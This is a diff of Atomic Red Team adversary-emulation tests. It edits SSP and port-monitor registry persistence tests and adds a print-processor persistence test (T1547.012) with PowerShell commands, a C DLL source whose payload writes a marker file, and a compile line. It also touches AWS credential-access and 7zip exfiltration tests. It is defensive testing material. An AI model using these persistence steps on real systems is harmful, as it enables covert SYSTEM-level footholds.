+- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry
+  auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
  description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
  supported_platforms:
  - windows
-  input_arguments:
-    fake_ssp_dll:
-      description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32.
-      type: string
-      default: not-a-ssp
  executor:
    command: |
-      # run these in sequence
-      $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-      $SecurityPackagesUpdated = $SecurityPackages
-      $SecurityPackagesUpdated += "#{fake_ssp_dll}"
-      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
-      # revert (before reboot)
-      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+      $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+      Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+      $newvalue = "AtomicTest.dll";
+      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+      
+    cleanup_command: |-
+      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+      Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+      Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -40,7 +40,7 @@ Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot


 ```cmd
-reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ
+reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f
 ```

 #### Cleanup Commands:
@@ -13,7 +13,7 @@ atomic_tests:
      default: $PathToAtomicsFolder\T1547.010\bin\PortMonitor.dll
  executor:
    command: |
-      reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ
+      reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f
    cleanup_command: |
      reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /f >nul 2>&1
    name: command_prompt
@@ -0,0 +1,64 @@
+# T1547.012 - Boot or Logon Autostart Execution: Print Processors
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/012)
+<blockquote>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. 
+
+Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the <code>GetPrintProcessorDirectory</code> API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Print Processors](#atomic-test-1---print-processors)
+
+
+<br/>
+
+## Atomic Test #1 - Print Processors
+Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+Note: The test assumes a x64 Windows operating system.
+
+The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| restart | set to 1 if you want the computer to reboot as part of the test | integer | 0|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+net stop spooler
+Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+net start spooler
+if(#{restart}){
+  Restart-Computer
+}
+```
+
+#### Cleanup Commands:
+```powershell
+net stop spooler
+rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+net start spooler
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,37 @@
+attack_technique: T1547.012
+display_name: 'Boot or Logon Autostart Execution: Print Processors'
+atomic_tests:
+- name: Print Processors
+  auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+  description: |
+    Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+    The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+    Note: The test assumes a x64 Windows operating system.
+
+    The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+  supported_platforms:
+  - windows
+  input_arguments:
+    restart:
+      description: set to 1 if you want the computer to reboot as part of the test
+      type: integer
+      default: 0
+  executor:
+    command: |
+      if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+      net stop spooler
+      Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+      net start spooler
+      if(#{restart}){
+        Restart-Computer
+      }
+    cleanup_command: |
+      net stop spooler
+      rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+      rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+      remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+      net start spooler
+    name: powershell
+    elevation_required: true
@@ -0,0 +1,82 @@
+#include <windows.h>
+#include <stdio.h>
+
+#define DllExport __declspec(dllexport)
+
+__declspec(dllexport) void PayloadFunction()
+{
+    HANDLE hFile;
+    hFile = CreateFile("C:\\Users\\Public\\AtomicTest.txt", 
+                        GENERIC_WRITE, 
+                        0,
+                        NULL,
+                        CREATE_ALWAYS,
+                        FILE_ATTRIBUTE_NORMAL,
+                        NULL);
+
+   if (hFile == INVALID_HANDLE_VALUE) 
+    { 
+        printf("Unable to create file\n");
+        return -1;
+    }
+
+}
+
+BOOL ClosePrintProcessor(HANDLE hPrintProcessor)
+{
+    return 1;
+}
+
+BOOL ControlPrintProcessor(HANDLE hPrintProcessor, DWORD Command)
+{
+    return 1;
+}
+
+BOOL EnumPrintProcessorDatatypesW(LPWSTR pName, LPWSTR pPrintProcessorName, DWORD Level, LPBYTE pDatatypes, DWORD cbBuf, LPDWORD pcbNeeded, LPDWORD pcReturned)
+{
+    // executes when DLL is loaded
+    PayloadFunction();
+    return 1;
+}
+
+DWORD GetPrintProcessorCapabilities(LPTSTR pValueName, DWORD dwAttributes, LPBYTE pData, DWORD nSize, LPDWORD pcbNeeded)
+{
+    return 0;
+}
+
+typedef struct _PRINTPROCESSOROPENDATA {
+    PDEVMODE pDevMode;
+    LPWSTR   pDatatype;
+    LPWSTR   pParameters;
+    LPWSTR   pDocumentName;
+    DWORD    JobId;
+    LPWSTR   pOutputFile;
+    LPWSTR   pPrinterName;
+} PRINTPROCESSOROPENDATA, * PPRINTPROCESSOROPENDATA, * LPPRINTPROCESSOROPENDATA;
+
+HANDLE OpenPrintProcessor(LPWSTR pPrinterName, PPRINTPROCESSOROPENDATA pPrintProcessorOpenData)
+{
+    return (HANDLE)11;
+}
+
+BOOL PrintDocumentOnPrintProcessor(HANDLE hPrintProcessor, LPWSTR pDocumentName)
+{
+    return 1;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
+{
+    switch (fdwReason)
+    {
+    case DLL_PROCESS_ATTACH:
+        break;
+    case DLL_THREAD_ATTACH:
+        break;
+    case DLL_PROCESS_DETACH:
+        break;
+    case DLL_THREAD_DETACH:
+        break;
+    }
+
+    return 1;
+}
@@ -0,0 +1,7 @@
+EXPORTS
+  ClosePrintProcessor
+  ControlPrintProcessor
+  EnumPrintProcessorDatatypesW
+  GetPrintProcessorCapabilities
+  OpenPrintProcessor
+  PrintDocumentOnPrintProcessor
@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll
@@ -12,7 +12,7 @@
 ## Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus
 This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/

-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** Linux, macOS, Iaas:aws


 **auto_generated_guid:** a21118de-b11e-4ebd-b655-42f11142df0c
@@ -8,6 +8,7 @@ atomic_tests:
  supported_platforms:
  - linux
  - macos
+  - iaas:aws
  input_arguments:
    stratus_path:
      description: Path of stratus binary
@@ -199,7 +199,7 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "PathToAtomicsFolder\..\ExternalP
 <br/>

 ## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
-Note: Requires 7zip installation
+Note: This test requires 7zip installation

 **Supported Platforms:** Windows

@@ -228,6 +228,10 @@ echo "This file will be encrypted" > .\encrypted_file.txt
 dir
 ```

+#### Cleanup Commands:
+```cmd
+rmdir /s /Q $PathToAtomicsFolder\T1560.001\victim-files >nul 2>&1
+```



@@ -240,7 +244,7 @@ if not exist "#{7zip_exe}" (exit /b 1)
 ##### Get Prereq Commands:
 ```cmd
 echo Downloading 7-zip installer
-bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
+bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2301-x64.exe" #{7zip_installer}
 #{7zip_installer} /S
 ```

--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll`